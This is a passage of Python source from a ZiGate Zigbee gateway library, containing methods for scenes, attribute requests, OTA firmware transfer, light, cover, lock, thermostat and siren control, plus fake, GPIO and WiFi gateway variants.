return self.send_data(0x00A4, data)
def recall_scene(self, addr, endpoint, group, scene):
'''
Store scene
'''
addr = self.__addr(addr)
group = self.__addr(group)
data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
return self.send_data(0x00A5, data)
def scene_membership_request(self, addr, endpoint, group):
'''
Scene Membership request
'''
addr = self.__addr(addr)
group = self.__addr(group)
data = struct.pack('!BHBBH', 2, addr, 1, endpoint, group)
return self.send_data(0x00A6, data)
def copy_scene(self, addr, endpoint, from_group, from_scene, to_group, to_scene):
'''
Copy scene
'''
addr = self.__addr(addr)
from_group = self.__addr(from_group)
to_group = self.__addr(to_group)
data = struct.pack('!BHBBBHBHB', 2, addr, 1, endpoint, 0,
from_group, from_scene,
to_group, to_scene)
return self.send_data(0x00A9, data)
def initiate_touchlink(self):
'''
Initiate Touchlink
'''
return self.send_data(0x00D0)
def touchlink_factory_reset(self):
'''
Touchlink factory reset
'''
return self.send_data(0x00D2)
def identify_trigger_effect(self, addr, endpoint, effect="blink"):
'''
identify_trigger_effect
effects available:
- blink: Light is switched on and then off (once)
- breathe: Light is switched on and off by smoothly increasing and then
decreasing its brightness over a one-second period, and then this is repeated 15 times
- okay: Colour light goes green for one second. Monochrome light flashes twice in one second.
- channel_change: Colour light goes orange for 8 seconds. Monochrome light switches to
maximum brightness for 0.5 s and then to minimum brightness for 7.5 s
- finish_effect: Current stage of effect is completed and then identification mode is
terminated (e.g. for the Breathe effect, only the current one-second cycle will be completed)
- Stop effect: Current effect and identification mode are terminated as soon as possible
'''
effects = {
'blink': 0x00,
'breathe': 0x01,
'okay': 0x02,
'channel_change': 0x0b,
'finish_effect': 0xfe,
'stop_effect': 0xff
}
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
if effect not in effects.keys():
effect = 'blink'
effect_variant = 0 # Current Zigbee standard doesn't provide any variant
data = struct.pack('!B' + addr_fmt + 'BBBB', addr_mode, addr, 1, endpoint, effects[effect], effect_variant)
return self.send_data(0x00E0, data)
def read_attribute_request(self, addr, endpoint, cluster, attributes,
direction=0, manufacturer_code=0):
'''
Read Attribute request
attribute can be a unique int or a list of int
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
if not isinstance(attributes, list):
attributes = [attributes]
length = len(attributes)
manufacturer_specific = manufacturer_code != 0
for i in range(0, length, 10):
sub_attributes = attributes[i: i + 10]
sub_length = len(sub_attributes)
data = struct.pack('!B' + addr_fmt + 'BBHBBHB{}H'.format(sub_length), addr_mode, addr, 1,
endpoint, cluster,
direction, manufacturer_specific,
manufacturer_code, sub_length, *sub_attributes)
self.send_data(0x0100, data)
def write_attribute_request(self, addr, endpoint, cluster, attributes,
direction=0, manufacturer_code=0):
'''
Write Attribute request
attribute could be a tuple of (attribute_id, attribute_type, data)
or a list of tuple (attribute_id, attribute_type, data)
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
fmt = ''
if not isinstance(attributes, list):
attributes = [attributes]
attributes_data = []
for attribute_tuple in attributes:
data_type = DATA_TYPE[attribute_tuple[1]]
fmt += 'HB' + data_type
attributes_data += attribute_tuple
length = len(attributes)
manufacturer_specific = manufacturer_code != 0
data = struct.pack('!B' + addr_fmt + 'BBHBBHB{}'.format(fmt), addr_mode, addr, 1,
endpoint, cluster,
direction, manufacturer_specific,
manufacturer_code, length, *attributes_data)
self.send_data(0x0110, data)
def reporting_request(self, addr, endpoint, cluster, attributes,
direction=0, manufacturer_code=0, min_interval=1, max_interval=3600):
'''
Configure reporting request
attribute could be a tuple of (attribute_id, attribute_type)
or a list of tuple (attribute_id, attribute_type)
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
if not isinstance(attributes, list):
attributes = [attributes]
length = len(attributes)
attribute_direction = 0
timeout = 0
change = 0
fmt = ''
attributes_data = []
for attribute_tuple in attributes:
fmt += 'BBHHHHB'
attributes_data += [attribute_direction,
attribute_tuple[1],
attribute_tuple[0],
min_interval,
max_interval,
timeout,
change
]
manufacturer_specific = manufacturer_code != 0
data = struct.pack('!B' + addr_fmt + 'BBHBBHB{}'.format(fmt), addr_mode, addr, 1, endpoint, cluster,
direction, manufacturer_specific,
manufacturer_code, length, *attributes_data)
r = self.send_data(0x0120, data, 0x8120)
# reporting not supported on cluster 6, supposed on/off attribute
if r and r.status == 0x8c and r.cluster == 6:
device = self._devices[r.addr]
device.set_assumed_state()
return r
def ota_load_image(self, path_to_file):
# Check that ota process is not active
if self._ota['active'] is True:
LOGGER.error('Cannot load image while OTA process is active.')
self.get_ota_status()
return
# Try reading file from user provided path
try:
with open(path_to_file, 'rb') as f:
ota_file_content = f.read()
except OSError as err:
LOGGER.error('{path}: {error}'.format(path=path_to_file, error=err))
return False
if ota_file_content.startswith(b'NGIS'):
LOGGER.debug('Signed file, removing signature')
header_end = struct.unpack('<I', ota_file_content[0x10:0x14])[0]
footer_pos = struct.unpack('<I', ota_file_content[0x18:0x1C])[0]
ota_file_content = ota_file_content[header_end:footer_pos]
# Ensure that file has 69 bytes so it can contain header
if len(ota_file_content) < 69:
LOGGER.error('OTA file is too short')
return False
# Read header data
try:
header_data = list(struct.unpack('<LHHHHHLH32BLBQHH', ota_file_content[:69]))
except struct.error:
LOGGER.exception('Header is not correct')
return False
# Fix header str
# First replace null characters from header str to spaces
for i in range(8, 40):
if header_data[i] == 0x00:
header_data[i] = 0x20
# Reconstruct header data
header_data_compact = header_data[0:8] + [header_data[8:40]] + header_data[40:]
# Convert header data to dict
header_headers = [
'file_id', 'header_version', 'header_length', 'header_fctl', 'manufacturer_code', 'image_type',
'image_version', 'stack_version', 'header_str', 'size', 'security_cred_version', 'upgrade_file_dest',
'min_hw_version', 'max_hw_version'
]
header = dict(zip(header_headers, header_data_compact))
# Check that size from header corresponds to file size
if header['size'] != len(ota_file_content):
LOGGER.error('Header size({header}) and file size({file}) does not match'.format(
header=header['size'], file=len(ota_file_content)
))
return False
destination_address_mode = 0x02
destination_address = 0x0000
data = struct.pack('!BHlHHHHHLH32BLBQHH', destination_address_mode, destination_address, *header_data)
response = self.send_data(0x0500, data)
# If response is success place header and file content to variable
if response.status == 0:
LOGGER.info('OTA header loaded to server successfully.')
self._ota_reset_local_variables()
self._ota['image']['header'] = header
self._ota['image']['data'] = ota_file_content
else:
LOGGER.warning('Something wrong with ota file header.')
def _ota_send_image_data(self, request):
errors = False
# Ensure that image is loaded using ota_load_image
if self._ota['image']['header'] is None:
LOGGER.error('No header found. Load image using ota_load_image(\'path_to_ota_image\')')
errors = True
if self._ota['image']['data'] is None:
LOGGER.error('No data found. Load image using ota_load_image(\'path_to_ota_ota\')')
errors = True
if errors:
return
# Compare received image data to loaded image
errors = False
if request['image_version'] != self._ota['image']['header']['image_version']:
LOGGER.error('Image versions do not match. Make sure you have correct image loaded.')
errors = True
if request['image_type'] != self._ota['image']['header']['image_type']:
LOGGER.error('Image types do not match. Make sure you have correct image loaded.')
errors = True
if request['manufacturer_code'] != self._ota['image']['header']['manufacturer_code']:
LOGGER.error('Manufacturer codes do not match. Make sure you have correct image loaded.')
errors = True
if errors:
return
# Mark ota process started
if self._ota['starttime'] is False and self._ota['active'] is False:
self._ota['starttime'] = datetime.datetime.now()
self._ota['active'] = True
self._ota['transfered'] = 0
self._ota['addr'] = request['addr']
source_endpoint = 0x01
ota_status = 0x00 # Success. Using value 0x01 would make client to request data again later
# Get requested bytes from ota file
self._ota['transfered'] = request['file_offset']
end_position = request['file_offset'] + request['max_data_size']
ota_data_to_send = self._ota['image']['data'][request['file_offset']:end_position]
data_size = len(ota_data_to_send)
ota_data_to_send = struct.unpack('<{}B'.format(data_size), ota_data_to_send)
# Giving user feedback of ota process
self.get_ota_status(debug=True)
data = struct.pack('!BHBBBBLLHHB{}B'.format(data_size), request['address_mode'], self.__addr(request['addr']),
source_endpoint, request['endpoint'], request['sequence'], ota_status,
request['file_offset'], self._ota['image']['header']['image_version'],
self._ota['image']['header']['image_type'],
self._ota['image']['header']['manufacturer_code'],
data_size, *ota_data_to_send)
self.send_data(0x0502, data, wait_status=False)
def _ota_handle_upgrade_end_request(self, request):
if self._ota['active'] is True:
# Handle error statuses
if request['status'] == 0x00:
LOGGER.info('OTA image upload finnished successfully in {seconds}s.'.format(
seconds=(datetime.datetime.now() - self._ota['starttime']).seconds))
elif request['status'] == 0x95:
LOGGER.warning('OTA aborted by client')
elif request['status'] == 0x96:
LOGGER.warning('OTA image upload successfully, but image verification failed.')
elif request['status'] == 0x99:
LOGGER.warning('OTA image uploaded successfully, but client needs more images for update.')
elif request['status'] != 0x00:
LOGGER.warning('Some unexpected OTA status {}'.format(request['status']))
# Reset local ota variables
self._ota_reset_local_variables()
def _ota_reset_local_variables(self):
self._ota = {
'image': {
'header': None,
'data': None,
},
'active': False,
'starttime': False,
'transfered': 0,
'addr': None
}
def get_ota_status(self, debug=False):
if self._ota['active']:
image_size = len(self._ota['image']['data'])
time_passed = (datetime.datetime.now() - self._ota['starttime']).seconds
try:
time_remaining = int((image_size / self._ota['transfered']) * time_passed) - time_passed
except ZeroDivisionError:
time_remaining = -1
message = 'OTA upgrade address {addr}: {sent:>{width}}/{total:>{width}} {percentage:.3%}'.format(
addr=self._ota['addr'], sent=self._ota['transfered'], total=image_size,
percentage=self._ota['transfered'] / image_size, width=len(str(image_size)))
message += ' time elapsed: {passed}s Time remaining estimate: {remaining}s'.format(
passed=time_passed, remaining=time_remaining
)
else:
message = "OTA process is not active"
if debug:
LOGGER.debug(message)
else:
LOGGER.info(message)
def ota_image_notify(self, addr, destination_endpoint=0x01, payload_type=0):
"""
Send image available notification to client. This will start ota process
:param addr:
:param destination_endpoint:
:param payload_type: 0, 1, 2, 3
:type payload_type: int
:return:
"""
# Get required data from ota header
if self._ota['image']['header'] is None:
LOGGER.warning('Cannot read ota header. No ota file loaded.')
return False
image_version = self._ota['image']['header']['image_version']
image_type = self._ota['image']['header']['image_type']
manufacturer_code = self._ota['image']['header']['manufacturer_code']
source_endpoint = 0x01
destination_address_mode = 0x02 # uint16
destination_address = self.__addr(addr)
query_jitter = 100
if payload_type == 0:
image_version = 0xFFFFFFFF
image_type = 0xFFFF
manufacturer_code = 0xFFFF
elif payload_type == 1:
image_version = 0xFFFFFFFF
image_type = 0xFFFF
elif payload_type == 2:
image_version = 0xFFFFFFFF
data = struct.pack('!BHBBBLHHB', destination_address_mode, destination_address,
source_endpoint, destination_endpoint, 0,
image_version, image_type, manufacturer_code, query_jitter)
self.send_data(0x0505, data)
def attribute_discovery_request(self, addr, endpoint, cluster,
direction=0, manufacturer_code=0):
'''
Attribute discovery request
'''
addr = self.__addr(addr)
manufacturer_specific = manufacturer_code != 0
data = struct.pack('!BHBBHHBBHB', 2, addr, 1, endpoint, cluster,
0, direction, manufacturer_specific,
manufacturer_code, 255)
self.send_data(0x0140, data)
def available_actions(self, addr, endpoint=None):
'''
Analyse specified endpoint to found available actions
actions are:
- onoff
- move
- lock
- ...
'''
device = self.get_device_from_addr(addr)
if device:
return device.available_actions(endpoint)
@register_actions(ACTIONS_ONOFF)
def action_onoff(self, addr, endpoint, onoff, on_time=0, off_time=0, effect=0, gradient=0):
'''
On/Off action
onoff : 0 - OFF
1 - ON
2 - Toggle
on_time : timed on in sec
off_time : timed off in sec
effect : effect id
gradient : effect gradient
Note that timed onoff and effect are mutually exclusive
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBB', addr_mode, addr, 1, endpoint, onoff)
cmd = 0x0092
if on_time or off_time:
cmd = 0x0093
data += struct.pack('!HH', on_time, off_time)
elif effect:
cmd = 0x0094
data = struct.pack('!BHBBBB', addr_mode, addr, 1, endpoint, effect, gradient)
return self.send_data(cmd, data)
@register_actions(ACTIONS_LEVEL)
def action_move_level(self, addr, endpoint, onoff=OFF, mode=0, rate=0):
'''
move to level
mode 0 up, 1 down
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBBBB', addr_mode, addr, 1, endpoint, onoff, mode, rate)
return self.send_data(0x0080, data)
@register_actions(ACTIONS_LEVEL)
def action_move_level_onoff(self, addr, endpoint, onoff=OFF, level=0, transition=1):
'''
move to level with on off
level between 0 - 100
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
level = int(level * 254 // 100)
data = struct.pack('!B' + addr_fmt + 'BBBBH', addr_mode, addr, 1, endpoint, onoff, level, transition)
return self.send_data(0x0081, data)
@register_actions(ACTIONS_LEVEL)
def action_move_step(self, addr, endpoint, onoff=OFF, step_mode=0, step_size=0, transition=1):
'''
move step
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBBBBH', addr_mode, addr, 1, endpoint, onoff,
step_mode, step_size, transition)
return self.send_data(0x0082, data)
@register_actions(ACTIONS_LEVEL)
def action_move_stop_onoff(self, addr, endpoint, onoff=OFF):
'''
move stop on off
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBB', addr_mode, addr, 1, endpoint, onoff)
return self.send_data(0x0084, data)
@register_actions(ACTIONS_HUE)
def action_move_hue(self, addr, endpoint, hue, direction=0, transition=1):
'''
move to hue
hue 0-360 in degrees
direction : 0 shortest, 1 longest, 2 up, 3 down
transition in second
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
hue = int(hue * 254 // 360)
data = struct.pack('!B' + addr_fmt + 'BBBBH', addr_mode, addr, 1, endpoint,
hue, direction, transition)
return self.send_data(0x00B0, data)
@register_actions(ACTIONS_HUE)
def action_move_hue_saturation(self, addr, endpoint, hue, saturation=100, transition=1):
'''
move to hue and saturation
hue 0-360 in degrees
saturation 0-100 in percent
transition in second
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
hue = int(hue * 254 // 360)
saturation = int(saturation * 254 // 100)
data = struct.pack('!B' + addr_fmt + 'BBBBH', addr_mode, addr, 1, endpoint,
hue, saturation, transition)
return self.send_data(0x00B6, data)
@register_actions(ACTIONS_HUE)
def action_move_hue_hex(self, addr, endpoint, color_hex, transition=1):
'''
move to hue color in #ffffff
transition in second
'''
rgb = hex_to_rgb(color_hex)
return self.action_move_hue_rgb(addr, endpoint, rgb, transition)
@register_actions(ACTIONS_HUE)
def action_move_hue_rgb(self, addr, endpoint, rgb, transition=1):
'''
move to hue (r,g,b) example : (1.0, 1.0, 1.0)
transition in second
'''
hue, saturation, level = colorsys.rgb_to_hsv(*rgb)
hue = int(hue * 360)
saturation = int(saturation * 100)
level = int(level * 100)
self.action_move_level_onoff(addr, endpoint, ON, level, 0)
return self.action_move_hue_saturation(addr, endpoint, hue, saturation, transition)
@register_actions(ACTIONS_COLOR)
def action_move_colour(self, addr, endpoint, x, y, transition=1):
'''
move to colour x y
x, y can be integer 0-65536 or float 0-1.0
transition in second
'''
addr = self._translate_addr(addr)
if isinstance(x, float) and x <= 1:
x = int(x * 65536)
if isinstance(y, float) and y <= 1:
y = int(y * 65536)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBHHH', addr_mode, addr, 1, endpoint,
x, y, transition)
return self.send_data(0x00B7, data)
@register_actions(ACTIONS_COLOR)
def action_move_colour_hex(self, addr, endpoint, color_hex, transition=1):
'''
move to colour #ffffff
convenient function to set color in hex format
transition in second
'''
x, y = hex_to_xy(color_hex)
return self.action_move_colour(addr, endpoint, x, y, transition)
@register_actions(ACTIONS_COLOR)
def action_move_colour_rgb(self, addr, endpoint, rgb, transition=1):
'''
move to colour (r,g,b) example : (1.0, 1.0, 1.0)
convenient function to set color in hex format
transition in second
'''
x, y = rgb_to_xy(rgb)
return self.action_move_colour(addr, endpoint, x, y, transition)
@register_actions(ACTIONS_TEMPERATURE)
def action_move_temperature(self, addr, endpoint, mired, transition=1):
'''
move colour to temperature
mired color temperature
transition in second
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBHH', addr_mode, addr, 1, endpoint,
mired, transition)
return self.send_data(0x00C0, data)
@register_actions(ACTIONS_TEMPERATURE)
def action_move_temperature_kelvin(self, addr, endpoint, temperature, transition=1):
'''
move colour to temperature
temperature unit is kelvin
transition in second
convenient function to use kelvin instead of mired
'''
temperature = int(1000000 // temperature)
return self.action_move_temperature(addr, endpoint, temperature, transition)
@register_actions(ACTIONS_TEMPERATURE)
def action_move_temperature_rate(self, addr, endpoint, mode, rate, min_mired, max_mired):
'''
move colour temperature in specified rate towards given min or max value
Available modes:
- 0: Stop
- 1: Increase
- 3: Decrease
rate: how many temperature units are moved in one second
min_mired: Minium temperature where decreasing stops in mired
max_mired: Maxium temperature where increasing stops in mired
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBBHHH', addr_mode, addr, 1, endpoint, mode, rate, min_mired, max_mired)
return self.send_data(0x00C1, data)
@register_actions(ACTIONS_LOCK)
def action_lock(self, addr, endpoint, lock):
'''
Lock / unlock
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBB', addr_mode, addr, 1, endpoint, lock)
return self.send_data(0x00f0, data)
@register_actions(ACTIONS_COVER)
def action_cover(self, addr, endpoint, cmd, param=None):
'''
Open, close, move, ...
cmd could be :
OPEN = 0x00
CLOSE = 0x01
STOP = 0x02
LIFT_VALUE = 0x04
LIFT_PERCENT = 0x05
TILT_VALUE = 0x07
TILT_PERCENT = 0x08
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
fmt = '!B' + addr_fmt + 'BBB'
addr = self.__addr(addr)
args = [addr_mode, addr, 1, endpoint, cmd]
if cmd in (0x04, 0x07):
fmt += 'H'
args.append(param)
elif cmd in (0x05, 0x08):
fmt += 'B'
args.append(param)
data = struct.pack(fmt, *args)
return self.send_data(0x00fa, data)
@register_actions(ACTIONS_IAS)
def action_ias_warning(self, addr, endpoint,
mode='burglar', strobe=True, level='low',
duration=60, strobe_cycle=10, strobe_level='low',
direction=0, manufacturer_code=0):
'''
mode: stop, burglar, fire, emergency, policepanic, firepanic, emergencypanic
duration: seconds
level: low, medium, high, veryhigh
strobe_cycle: duty-cycle of the strobe pulse, expressed as a percentage in 10% steps
strobe_level: level of the strobe (pulse) low, medium, high, veryhigh
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
manufacturer_specific = manufacturer_code != 0
mode = {'stop': '0000', 'burglar': '0001', 'fire': '0010', 'emergency': '0011',
'policepanic': '0100', 'firepanic': '0101', 'emergencypanic': '0110'
}.get(mode, '0000')
strobe = '01' if strobe else '00'
level = {'low': '00', 'medium': '01', 'high': '10', 'veryhigh': '11'}.get(level, '00')
warning_mode_strobe_level = int(mode + strobe + level, 2)
strobe_level = {'low': 0, 'medium': 1, 'high': 2, 'veryhigh': 3}.get(strobe_level, 0)
data = struct.pack('!B' + addr_fmt + 'BBBBHBHBB', addr_mode, addr, 1,
endpoint,
direction, manufacturer_specific, manufacturer_code,
warning_mode_strobe_level, duration, strobe_cycle, strobe_level)
self.send_data(0x0111, data)
@register_actions(ACTIONS_IAS)
def action_ias_squawk(self, addr, endpoint,
mode='armed',
strobe=True,
level='low',
direction=0, manufacturer_code=0):
'''
mode: armed or disarmed
strobe: True or False
level: low, medium, high, veryhigh
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
manufacturer_specific = manufacturer_code != 0
mode = {'armed': '0000', 'disarmed': '1000'}.get(mode, '0000')
strobe = '1' if strobe else '0'
level = {'low': '00', 'medium': '01', 'high': '10', 'veryhigh': '11'}.get(level, '00')
squawk_mode_strobe_level = int(mode + strobe + '0' + level, 2)
data = struct.pack('!B' + addr_fmt + 'BBBBHB', addr_mode, addr, 1,
endpoint,
direction, manufacturer_specific, manufacturer_code,
squawk_mode_strobe_level)
self.send_data(0x0112, data)
@register_actions(ACTIONS_THERMOSTAT)
def action_thermostat_occupied_heating_setpoint(self, addr, endpoint, temperature,
direction=0, manufacturer_code=0):
"""
Convenient function to set heating temperature on thermostat
"""
return self.write_attribute_request(addr, endpoint, 0x0201,
(0x0012, 0x29, temperature * 100),
direction, manufacturer_code)
@register_actions(ACTIONS_THERMOSTAT)
def action_thermostat_system_mode(self, addr, endpoint, mode, direction=0, manufacturer_code=0):
"""
Convenient function to set thermostat mode
mode :
'off': 0x00,
'auto': 0x01,
'cool': 0x03,
'heat': 0x04,
'emergency_heat': 0x05,
'precooling': 0x06,
'fan': 0x07
"""
modes = {'off': 0x00,
'auto': 0x01,
'cool': 0x03,
'heat': 0x04,
'emergency_heat': 0x05,
'precooling': 0x06,
'fan': 0x07}
mode = modes.get(mode, mode)
if mode == 0x03:
self.write_attribute_request(addr, endpoint, 0x0201,
(0x001B, 0x30, 0),
direction, manufacturer_code)
elif mode == 0x04:
self.write_attribute_request(addr, endpoint, 0x0201,
(0x001B, 0x30, 2),
direction, manufacturer_code)
return self.write_attribute_request(addr, endpoint, 0x0201,
(0x001C, 0x30, mode),
direction, manufacturer_code)
def raw_aps_data_request(self, addr, src_ep, dst_ep, profile, cluster, payload, addr_mode=2, security=0):
'''
Send raw APS Data request
'''
addr = self.__addr(addr)
length = len(payload)
radius = 0
data = struct.pack('!BHBBHHBBB{}s'.format(length), addr_mode, addr, src_ep, dst_ep,
cluster, profile, security, radius, length, payload)
return self.send_data(0x0530, data)
def set_TX_power(self, percent=100):
'''
Set TX Power between 0-100%
'''
percent = percent * 255 // 100
data = struct.pack('!B', percent)
return self.send_data(0x0806, data)
def get_TX_power(self):
'''
Get TX Power
'''
return self.send_data(0x0807, wait_response=0x8807)
def start_mqtt_broker(self, host='localhost:1883', username=None, password=None):
'''
Start a MQTT broker in a new thread
'''
from .mqtt_broker import MQTT_Broker
broker = MQTT_Broker(self, host, username, password)
broker.connect()
self.broker_thread = threading.Thread(target=broker.client.loop_forever,
name='ZiGate-MQTT')
self.broker_thread.setDaemon(True)
self.broker_thread.start()
def generate_templates(self, dirname='~'):
'''
Generate template file for each device
'''
for device in self._devices.values():
device.generate_template(dirname)
class FakeZiGate(ZiGate):
'''
Fake ZiGate for test only without real hardware
'''
def __init__(self, port='auto', path='~/.zigate.json',
auto_start=False, auto_save=False, channel=None, adminpanel=False):
ZiGate.__init__(self, port=port, path=path, auto_start=auto_start, auto_save=auto_save,
channel=channel, adminpanel=adminpanel)
self._addr = '0000'
self._ieee = 'fedcba9876543210'
# by default add a fake xiaomi temp sensor on address abcd
device = Device({'addr': 'abcd', 'ieee': '0123456789abcdef'}, self)
device.set_attribute(1, 0, {'attribute': 5, 'lqi': 170, 'data': 'lumi.weather'})
device.load_template()
self._devices['abcd'] = device
self._neighbours_table_cache = [['0000', 'abcd', 255]]
def startup(self, channel=None):
ZiGate.startup(self, channel=channel)
self.connection.start_fake_response()
def setup_connection(self):
self.connection = FakeTransport()
class ZiGateGPIO(ZiGate):
def __init__(self, port='auto', path='~/.zigate.json',
auto_start=True,
auto_save=True,
channel=None,
adminpanel=False):
GPIO.setmode(GPIO.BCM)
GPIO.setup(27, GPIO.OUT) # GPIO2
self.set_running_mode()
ZiGate.__init__(self, port=port, path=path, auto_start=auto_start,
auto_save=auto_save, channel=channel, adminpanel=adminpanel)
self._model = 'GPIO'
def set_running_mode(self):
GPIO.output(27, GPIO.HIGH) # GPIO2
GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # GPIO0
sleep(0.5)
GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_UP) # GPIO0
sleep(0.5)
def set_bootloader_mode(self):
GPIO.output(27, GPIO.LOW) # GPIO2
GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # GPIO0
sleep(0.5)
GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_UP) # GPIO0
sleep(0.5)
def flash_firmware(self, path, erase_eeprom=False):
from .flasher import flash
self.set_bootloader_mode()
flash(self._port, write=path, erase=erase_eeprom)
self.set_running_mode()
def __del__(self):
GPIO.cleanup()
ZiGate.__del__(self)
def setup_connection(self):
self.connection = ThreadSerialConnection(self, self._port, '3f201')
class ZiGateWiFi(ZiGate):
def __init__(self, host, port=None, path='~/.zigate.json',
auto_start=True,
auto_save=True,
channel=None,
adminpanel=False):
self._host = host
ZiGate.__init__(self, port=port, path=path,
auto_start=auto_start,
auto_save=auto_save,
channel=channel,
adminpanel=adminpanel
)
self._model = 'WiFi'
def setup_connection(self):
self.connection = ThreadSocketConnection(self, self._host, self._port)
def reboot(self):
'''
ask zigate wifi to reboot
'''
import requests
requests.get('http://{}/reboot'.format(self._host))
class DeviceEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, Device):
return obj.to_json()
if isinstance(obj, Cluster):
return obj.to_json()
if isinstance(obj, Response):
return obj.cleaned_data()
elif isinstance(obj, bytes):
return hexlify(obj).decode()
elif isinstance(obj, set):
return list(obj)
elif isinstance(obj, type):
return obj.__name__
return json.JSONEncoder.default(self, obj)
class Device(object):
def __init__(self, info=None, zigate_instance=None):
self._zigate = zigate_instance
self._lock = threading.Lock()
self.info = info or {}
self.endpoints = {}
self._expire_timer = {}
self._fast_change = {}
self.missing = False
self.genericType = ''
self.discovery = ''
self.name = ''
def _lock_acquire(self):
LOGGER.debug('Acquire Lock on device %s', self)
r = self._lock.acquire(True, 5)
if not r:
LOGGER.error('Failed to acquire Lock on device %s', self)
def _lock_release(self):
LOGGER.debug('Release Lock on device %s', self)
if not self._lock.locked():
LOGGER.error('Device Lock not locked for device %s !', self)
else:
self._lock.release()
def available_actions(self, endpoint_id=None):
'''
Analyse specified endpoint to found available actions
actions are:
- onoff
- move
- lock
- ...
'''
actions = {}
if not endpoint_id:
endpoint_id = list(self.endpoints.keys())
if not isinstance(endpoint_id, list):
endpoint_id = [endpoint_id]
for ep_id in endpoint_id:
actions[ep_id] = []
endpoint = self.endpoints.get(ep_id)
if endpoint:
# some light have device=0 so try to work around
if endpoint['device'] in ACTUATORS or (endpoint['device'] == 0 and self.receiver_on_when_idle()):
if 0x0006 in endpoint['in_clusters']:
actions[ep_id].append(ACTIONS_ONOFF)
if 0x0008 in endpoint['in_clusters'] and endpoint['device'] != 0x010a:
# except device 0x010a because Tradfri Outlet don't have level control
# but still have endpoint 8...
actions[ep_id].append(ACTIONS_LEVEL)
if 0x0101 in endpoint['in_clusters'] and self.receiver_on_when_idle():
# because of xiaomi vibration sensor
actions[ep_id].append(ACTIONS_LOCK)
if 0x0102 in endpoint['in_clusters']:
actions[ep_id].append(ACTIONS_COVER)
if 0x0201 in endpoint['in_clusters']:
actions[ep_id].append(ACTIONS_THERMOSTAT)
if 0x0300 in endpoint['in_clusters']:
# if endpoint['device'] in (0x0102, 0x0105):
if endpoint['device'] in (0x0105,):
actions[ep_id].append(ACTIONS_HUE)
elif endpoint['device'] in (0x010D, 0x0210):
actions[ep_id].append(ACTIONS_COLOR)
actions[ep_id].append(ACTIONS_HUE)
actions[ep_id].append(ACTIONS_TEMPERATURE)
elif endpoint['device'] in (0x0102, 0x010C, 0x0220):
actions[ep_id].append(ACTIONS_TEMPERATURE)
else: # 0x0200
actions[ep_id].append(ACTIONS_COLOR)
actions[ep_id].append(ACTIONS_HUE)
if 0x0502 in endpoint['in_clusters']:
actions[ep_id].append(ACTIONS_IAS)
return actions
def _create_actions(self):
'''
create convenient functions for actions
'''
a_actions = self.available_actions()
for endpoint_id, actions in a_actions.items():
for action in actions:
for func_name in ACTIONS.get(action, []):
func = getattr(self._zigate, func_name)
wfunc = functools.partial(func, self.addr, endpoint_id)
functools.update_wrapper(wfunc, func)
setattr(self, func_name, wfunc)
def _bind_report(self, enpoint_id=None):
'''
automatically bind and report data
'''
if not BIND_REPORT:
return
if enpoint_id:
endpoints_list = [(enpoint_id, self.endpoints[enpoint_id])]
else:
endpoints_list = list(self.endpoints.items())
LOGGER.debug('Start automagic bind and report process for device %s', self)
for endpoint_id, endpoint in endpoints_list:
# if endpoint['device'] in ACTUATORS: # light
LOGGER.debug('Bind and report endpoint %s for device %s', endpoint_id, self)
if 0x0001 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0001')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0001)
self._zigate.reporting_request(self.addr, endpoint_id,
0x0001, (0x0020, 0x20))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0001, (0x0021, 0x20))
if 0x0006 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0006')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0006)
self._zigate.reporting_request(self.addr, endpoint_id,
0x0006, (0x0000, 0x10))
if 0x0008 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0008')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0008)
